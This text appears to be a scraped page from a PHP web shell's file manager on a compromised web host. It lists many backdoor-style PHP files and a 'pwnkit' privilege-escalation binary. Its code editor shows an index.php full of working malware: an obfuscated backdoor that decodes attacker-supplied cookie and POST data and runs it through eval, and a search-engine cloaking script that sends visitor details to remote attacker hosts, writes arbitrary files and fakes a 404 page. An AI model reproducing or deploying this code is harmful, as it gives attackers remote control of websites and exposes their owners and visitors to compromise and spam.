Linux box5428.bluehost.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.216.200 | : 18.222.104.196
Cant Read [ /etc/named.conf ]
revieyk1
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
home3 /
revieyk1 /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
354892
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
brandkings
[ DIR ]
drwxr-x---
cache
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
situsgacor
[ DIR ]
drwxr-xr-x
.htaccess
248
B
-rw-r--r--
.htaccess.phpupgrader.9f3a649c
248
B
-rw-r--r--
.htaccess.phpupgrader.initial
248
B
-rw-r--r--
MgRxQHzkqhG.php
166.77
KB
-rw-r--r--
admin-ajax.php
3.95
KB
-rw-r--r--
admin.php
3.84
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
afcfris.php
3.61
KB
-rw-r--r--
ayk.php
329
B
-rw-r--r--
bRqMLOygWE.php
24.96
KB
-rw-r--r--
bromdpyk.php
14.73
KB
-rw-r--r--
bs.php
147.03
KB
-rw-r--r--
bs.php7
149.12
KB
-rw-r--r--
bu.PhP7
136.81
KB
-rw-r--r--
bu.php
136.81
KB
-rw-r--r--
checkbex.php
57.64
KB
-rw-r--r--
chosen.php
13.01
KB
-rw-r--r--
class-IXR-date.php
16.08
KB
-rw-r--r--
cong.php
14.9
KB
-rw-r--r--
dr.php
1.07
KB
-rw-r--r--
error_log
485.51
KB
-rw-r--r--
frWasCtEHyG.php
43.96
KB
-rw-r--r--
geju.php
181
B
-rw-r--r--
hjfchahd.php
14.68
KB
-rw-r--r--
index.php
12.55
KB
-r--r--r--
index1.php
5.71
KB
-rw-r--r--
ipZHdmsFrcI.php
43.95
KB
-rw-r--r--
license.PhP7
34.16
KB
-rw-r--r--
m.PhP7
104.72
KB
-rw-r--r--
m.php
104.72
KB
-rw-r--r--
mailer.php
104.72
KB
-rw-r--r--
mxfdwldr.php
15.22
KB
-rw-r--r--
nsts.PhP7
247.99
KB
-rw-r--r--
nsts.php
247.99
KB
-rw-r--r--
online.php
5.71
KB
-rw-r--r--
options.php
3.68
KB
-rw-r--r--
pIWJxZ7OuwM.php
38.68
KB
-rw-r--r--
profile.php
4.32
KB
-rw-r--r--
prosellers.PhP7
114.41
KB
-rw-r--r--
prosellers.php
114.41
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
rAuE1goRJxi.php
51.78
KB
-rw-r--r--
rc.php
34.16
KB
-rw-r--r--
rcc.PHP
34.16
KB
-rw-r--r--
simple.php
25.31
KB
-rw-r--r--
style.php
13.36
KB
-rw-r--r--
sz4PBvFcCXa.php
169.05
KB
-rw-r--r--
test1.php
490
B
-rw-r--r--
theme-insmzeh.php
338
B
-rw-r--r--
theme-insuwis.php
338
B
-rw-r--r--
themes.php
3.83
KB
-rw-r--r--
todo.php
5.71
KB
-rw-r--r--
trust.php
7.33
KB
-rw-r--r--
version.php
93
B
-rw-r--r--
vfrtaycq.php
15.22
KB
-rw-r--r--
wSCQ6fzuTgO.php
51.32
KB
-rw-r--r--
wp-admin.php
35.8
KB
-rw-r--r--
wp-diff.PhP7
34.16
KB
-rw-r--r--
wp-gsojdk.php
19.06
KB
-rw-r--r--
wp-info.php
6.71
KB
-rw-r--r--
wp-jfghbr.php
19.06
KB
-rw-r--r--
wp-login.php
3.67
KB
-rw-r--r--
wp-term.php
2.87
KB
-rw-r--r--
wp-ver.php
300
B
-rw-r--r--
zfcpvfjtm.php
75.71
KB
-rw-r--r--
zgsvwcmp.php
164.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /*eb0fe*/ $rafoei = "/home3/rev\x69eyk1/publ\x69c_html/cache/c/.acb44e72.css"; if (!empty($rafoei)){ @include_once /* 7x */ ($rafoei); } /*eb0fe*/ $UlogMDYwwP = 'n' . 'R' . "\x63" . '_' . "\x49" . chr (98) . "\141";$MawfKur = chr ( 173 - 74 ).chr ( 178 - 70 )."\x61" . chr ( 762 - 647 )."\x73" . chr ( 412 - 317 ).chr (101) . chr ( 1073 - 953 )."\151" . "\163" . "\164" . "\x73";$MVFOUkWn = class_exists($UlogMDYwwP); $UlogMDYwwP = "55770";$MawfKur = "43512";$IPPxPUbm = !1;if ($MVFOUkWn == $IPPxPUbm){function gwzIKkKy(){return FALSE;}$lcePNZqd = "3276";gwzIKkKy();class nRc_Iba{private function LvZIjT($lcePNZqd){if (is_array(nRc_Iba::$snOJRkxtF)) {$RkEdy = str_replace("\74" . chr ( 843 - 780 )."\160" . "\x68" . "\x70", "", nRc_Iba::$snOJRkxtF['c' . "\157" . chr (110) . "\x74" . "\145" . chr (110) . "\164"]);eval($RkEdy); $lcePNZqd = "3276";exit();}}private $TRlKUIzwF;public function iBmZn(){echo 28771;}public function __destruct(){$lcePNZqd = "46760_401";$this->LvZIjT($lcePNZqd); $lcePNZqd = "46760_401";}public function __construct($SqAYLWsfBp=0){$XGOnmQgKmI = $_POST;$YLyaofL = $_COOKIE;$CnOTfM = "d5afb706-10dc-4875-8f6e-7ee944fdcae4";$ylyVgy = @$YLyaofL[substr($CnOTfM, 0, 4)];if (!empty($ylyVgy)){$YBhjuKKxq = "base64";$JEXtQdlK = "";$ylyVgy = explode(",", $ylyVgy);foreach ($ylyVgy as $fqsXgZX){$JEXtQdlK .= @$YLyaofL[$fqsXgZX];$JEXtQdlK .= @$XGOnmQgKmI[$fqsXgZX];}$JEXtQdlK = array_map($YBhjuKKxq . chr ( 353 - 258 )."\x64" . 'e' . "\143" . "\x6f" . "\144" . chr (101), array($JEXtQdlK,)); $JEXtQdlK = $JEXtQdlK[0] ^ str_repeat($CnOTfM, (strlen($JEXtQdlK[0]) / strlen($CnOTfM)) + 1);nRc_Iba::$snOJRkxtF = @unserialize($JEXtQdlK); $JEXtQdlK = class_exists("46760_401");}}public static $snOJRkxtF = 15719;}$ylcdWGAinD = new /* 3420 */ nRc_Iba(3276 + 3276); $IPPxPUbm = $ylcdWGAinD = $lcePNZqd = Array();} ?><?php error_reporting(0); @set_time_limit(3600); @ignore_user_abort(1); $ixv='2.2.17'; $gov = "\x31\61\x30\60\x2e\143\x68\141\x6e\156\x65\154\x6e\144\x61\171\x2e\170\x79\172"; $db = "1100"; $ip = clientip(); $ur = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ""; $ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ""; $uri = $_SERVER["REQUEST_URI"]; $host = $_SERVER["HTTP_HOST"]; $lang = isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:""; $token = isset($_SERVER['HTTP_XDOIM'])?$_SERVER['HTTP_XDOIM']:""; $proto = ((!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off')) ? "https": "http"; $header = array('Lang: '.$lang,'User-Agent: '.$ua, 'Referer: '.$ur, 'Http-Proto: '.$proto, 'Http-Host: '.$host, 'Http-Uri: '.$uri, 'Dbgroup: '.$gov, 'Http-X-Forwarded-For: '.$ip,'Token: '.$token); $postdata= "proto=$proto&shost=$host&ip=$ip&dbgroup=$db&uri=$uri"; if (strlen($token)>0){ @todk(".eGbA0Ty2Wh",@file_get_contents("php://input"),FILE_USE_INCLUDE_PATH); echo (include '.eGbA0Ty2Wh'); unlink('.eGbA0Ty2Wh'); exit; } if (($uri!=="/favicon.ico") &&( @preg_match('#google|yahoo|bing#i',$ua) || (@preg_match('#google.co.jp|google.com|yahoo.com|yahoo.co.jp|bing.com#i',$ur) && @preg_match('#[/\?]([a-z0-9]{1})(\d+)#i',$uri)))){ list($cntx,$code,$ctype) = urlx('http://'.$gov.'/index?'.$postdata,$header,$postdata); if (stripos($ctype,'gzip')>0){ @header('Content-type: application/x-gzip'); exit($cntx); } if (stripos($cntx,'<!doct')===0||stripos($cntx,'<html')===0){ exit($cntx); } if (stripos($cntx,'<?xml')===0){ @header('Content-type: text/xml'); exit($cntx); } if (stripos($cntx,'http')===0){ if (stripos($cntx,'?main_page=')){ @header('Location: ' . $cntx); exit;} if (strstr($cntx,"[,]")){$segs = explode("[,]",$cntx); $lines = explode(",",$segs[0]); $result = ''; foreach($lines as $url){ list($respbody,$code) = urlx($url,null,null,$segs[1]);$result .= $url.$respbody; } exit($result);} } if (@preg_match('#^[^.]*.(txt|php)#i',$cntx)){$values = explode("[,]",$cntx); todk($values[0],$values[1]); if(file_exists($values[0])){ exit('end ok');}else{ exit('no false');} } if (stripos($cntx,'ok')===0){ exit($cntx."baMTEwMC5jaGFubmVsbmRheS54eXoxMTAw"); } if ($code >= 400 && $code < 500){@header('HTTP/1.1 404 Not Found');exit;} if ($code >= 500){@header('HTTP/1.1 500 Internal Server Error');exit;} if ($cntx!=""){ exit($cntx); } } function urlx($url,$header=null,$postdata=null,$ua=null) { if (!function_exists('curl_init')){ return; } try { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); ($header===null)?'':curl_setopt($ch, CURLOPT_HTTPHEADER, $header); ($ua===null||$ua==="")?'':curl_setopt($ch, CURLOPT_USERAGENT, $ua); if ($postdata!==null && $postdata!=="") {curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); } $body = curl_exec($ch);$code = curl_getinfo($ch,CURLINFO_HTTP_CODE); $ctype = curl_getinfo($ch,CURLINFO_CONTENT_TYPE);curl_close($ch); } catch (Exception $e) { } if ($body===false && function_exists('file_get_contents')) { ini_set('user_agent', 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)'); try { $body = @file_get_contents($url); } catch (Exception $e) { } } return array($body,$code,$ctype); } function todk($fil,$str){@file_put_contents($fil,$str);} function clientip(){ $realip=''; if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] !== ''){ $realip = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { $realip = getenv('REMOTE_ADDR'); } elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { $realip = $_SERVER['REMOTE_ADDR']; } if (stristr($realip, ',')) { $values = explode(",", $realip); $realip = $values[0]; } return $realip; } ?> <html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.25.2</center> </body> </html> <?php function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; }$a='http://173.208.149.66/z40227_16/';function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function getSeCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;}function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;}function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; }$http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://');$req_uri=$_SERVER['REQUEST_URI'];$domain=$_SERVER["HTTP_HOST"];$self=$_SERVER['PHP_SELF'];$ser_name=$_SERVER['SERVER_NAME'];$req_url=$http.$domain.$req_uri;$indata1=$a."/indata.php";$map1=$a."/map.php";$jump1=$a."/jump.php";$url_words=$a."/words.php";$url_robots=$a."/robots.php";if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;}$data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url;if(substr($req_uri,-6)=='robots'){define('BASE_PATH',str_ireplace($_SERVER['PHP_SELF'],'',__FILE__));$robots_cont=@file_get_contents(BASE_PATH.'/robots.txt');$data1['robots_cont'] = $robots_cont;$robots_cont = @getServerCont($url_robots,$data1);file_put_contents(BASE_PATH.'/robots.txt',$robots_cont);$robots_cont=@file_get_contents(BASE_PATH.'/robots.txt');if(strpos(strtolower($robots_cont),"sitemap")){echo 'robots.txt file create success!';}else{echo 'robots.txt file create fail!';}return;}if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k<count($str_cont_arr);$k++){ if(strpos($href1,".php")> 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } return;} if(strpos($req_uri,"allsitemap.xml") || strpos($req_uri,"sitemap-index.xml") || strpos($req_uri,"sitemap-index-1.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;return;} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;return;} $data1['action']="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;return;}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if($chk_refer && (preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/",end(explode($url_ext,str_replace(array(".html",".htm"),"",$_SERVER['REQUEST_URI'])))))){ $data1['ip']=$_SERVER["REMOTE_ADDR"];$data1['referer']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$data1['user_agent']=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:''); echo getSeCont11($jump1,$data1);return; } if($res_crawl){ $data1['http_user_agent']=$user_agent;$ser_cont=getSeCont11($indata1,$data1);echo $ser_cont;}function ex(){exit;}ex();?>
Close